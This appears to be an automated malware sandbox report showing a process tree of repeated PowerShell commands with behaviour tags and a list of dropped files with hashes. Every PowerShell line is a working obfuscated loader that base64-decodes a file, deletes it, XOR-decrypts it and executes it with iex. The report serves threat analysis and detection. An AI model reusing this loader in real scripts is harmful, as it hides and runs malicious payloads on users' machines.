C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3552
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.1MB
MD5e5a591c125fdf21381cf543ed7706c66
SHA10baad9f119616ce5d0d39d4cdc9c884c1002a24e
SHA25615b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6
SHA51220e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35
-
C:\Users\Admin\7a6ed6269554a1c037aea7df7269c74c\c812ea66074d48fb6678c5c04f026b1e\a5b6e3f6abb8edaabeb155c09e7bc55f\f3db18990baf22f56acd8c8a0845a155\9b9c13d7b56ccdf7141be10fcdce6794\e5b03d238c0b7679b23eebbe8bb416ed\1fcdb6d122e421cd24cb4f4cff30921e
Filesize177KB
MD55b3c7d2e9174caea316042400c09ad20
SHA194debe7a146cee834035feb1d3c39fe51636c5d1
SHA256bdf62c12f32fd9dec0c5150fc5152903f18fa1123b806efb23763d92d7909ab3
SHA512775ed823d357df4f16038c408538c3ce8b4730f53fdf28b786f8b6c0c22dd1ad5c5ba1559590d3f7e48744e033b6ef55ecb949d6c9c10a0ff448fc4f4014805e
-
Filesize
2KB
MD56832ae680e8ddacc9752c84ff4ee94d5
SHA1eba38e3a46f6a27ec29c567c6766ba57fe7954ba
SHA25619c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632
SHA5129cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
19KB
MD59a78f8cfccc96a0c9dc170ae3c08e313
SHA1b1faf52d39be156cdc8dc2d494d1007f0083fbe2
SHA2562eca96ad3908abb7299765c9b0ab5cd4d5e2d59b214f69096797678895599b72
SHA51273ebf2764188c070241fc4bf9122a1dfa49cd834a17f8284351924bd8bb3cbb2fad8bf6da7ad2c78327bfb3dc5ff0d4fe5e9ed74858b7ca789f2f991fc8cec68
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11.8MB
MD587d28b3d2df1cab3711bf8d3b5b520c2
SHA11987a4bf2a37f6538c701461357a52b0bce1b980
SHA25688472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977
SHA51219226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4
-
Filesize
34KB
MD5c6ae924ad02500284f7e4efa11fa7cfc
SHA12a7770b473b0a7dc9a331d017297ff5af400fed8
SHA25631d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae
-
C:\Users\Admin\AppData\Local\Temp\is-RL6S9.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
Filesize3.1MB
MD544409fb9ddb085ddb1b297f03f2bf7da
SHA16214c05499c5ce029680c02c5ee793bfe8879ffa
SHA25687eea015c65b155888b9c66e16126e22898a72897e2a7dcfb4043bce15ed3015
SHA5129be0a889ae901806bd38747a6634c4dfb7cb12ec99f8a9a2cbffc017cb50e345377273f80a46ee8157a3b8d9073b59fbba4e73a79c1d2b9c60d55651987e5d99
-
Filesize
96KB
MD573b7520821ca66076f1414cd29a8accf
SHA12ccd5308633b4487f44df9590d6cea4fb3c3973e
SHA2565e383cc1f7bd839d15e01a048a3f4982667c838e257cdbcdcaafe50fb9417890
SHA512b229fb6d7bd6867e7ff55ebef21be53bf7a6c80fddd02f660a3dee4bde96b36d277a1a488ff6430d41d9f7c32bad08dfb3a9db18b878024cf17c9a6906dc1382
-
Filesize
32B
MD584fb49f0b58437b1c2c010acdd179d6d
SHA1b45243bb622d6d7c4bcaa1b1cb5692090c5f3f8f
SHA256b484008d9b2c3bfb55e5aa1d924df85ed6ddfbe2f80b9e0221e0fabaff00299b
SHA51278e903cffd704083c6a5fb5556f6079576ee2c198ba23549ba6f19eb2b32f145f14f0e1bffd17c8a5e247bbed3ebe47f349facb293cbbf595ece19d0756afa68